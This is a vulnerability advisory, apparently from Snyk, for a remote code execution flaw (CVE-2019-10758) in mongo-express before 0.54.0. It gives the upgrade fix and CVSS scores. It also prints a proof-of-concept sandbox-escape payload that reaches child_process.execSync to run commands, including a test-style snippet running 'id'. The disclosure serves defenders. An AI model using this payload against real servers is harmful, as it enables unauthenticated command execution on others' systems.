<p>Upgrade <code>mongo-express</code> to version 0.54.0 or higher.</p>

Remote Code Execution (RCE) Affecting mongo-express package, versions <0.54.0

Threat Intelligence

Mature

97.44% (100^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-JS-MONGOEXPRESS-473215
published 16 Oct 2019
disclosed 14 Oct 2019
credit Jonathan Leitschuh

Report a new vulnerability Found a mistake?

Introduced: 14 Oct 2019

CVE-2019-10758 Open this link in a new tab CWE-94 Open this link in a new tab First added by Snyk

How to fix?

Upgrade mongo-express to version 0.54.0 or higher.

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment.

PoC by Jonathan Leitschuh

# MacOS
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  it('should not be executable', function () {
      const test = `
      this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
      `;
      const result = bson.toBSON(calculatorTest);
    });

References

CVSS Scores

version 3.1

Attack Vector (AV)

Network
Attack Complexity (AC)

Low
Privileges Required (PR)

None
User Interaction (UI)

None

Scope (S)

Changed

Confidentiality (C)

High
Integrity (I)

High
Availability (A)

High